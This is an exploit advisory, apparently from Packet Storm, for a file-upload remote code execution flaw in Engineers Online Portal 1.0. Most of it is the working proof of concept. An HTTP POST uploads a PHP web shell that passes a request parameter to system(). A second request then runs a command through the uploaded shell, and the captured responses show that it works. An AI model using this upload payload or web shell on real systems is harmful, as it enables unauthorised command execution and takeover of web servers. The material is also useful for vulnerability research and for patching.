Engineers Online Portal version 1.0 suffers from a remote shell upload vulnerability.
432861b01a3782f95e8327c54c6f8cef9f8af6913d7b57e85785b4e710ea1c1d# Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)
# Date: 10/23/2021
# Exploit Author: SadKris
# Venor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Version: 1.0
# Tested on: XAMPP, Windows 11
# ------------------------------------------------------------------------------------------
# POC
# ------------------------------------------------------------------------------------------
# Request sent as base user
POST /EngineerShit/teacher_avatar.php HTTP/1.1
Host: localhost.me
Content-Length: 510
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost.me
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost.me/EngineerShit/dasboard_teacher.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
Connection: close
------WebKitFormBoundarygBJiBS0af0X03GTp
Content-Disposition: form-data; name="image"; filename="vuln.php"
Content-Type: application/octet-stream
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
system($_REQUEST['x']);
} else phpinfo();
?>
------WebKitFormBoundarygBJiBS0af0X03GTp
Content-Disposition: form-data; name="change"
# Response
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 01:51:19 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 119
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
window.location = "dasboard_teacher.php";
</script>
# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------
GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1
Host: localhost.me
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
Connection: close
# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 01:54:07 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Content-Length: 154
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
gottem bois
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed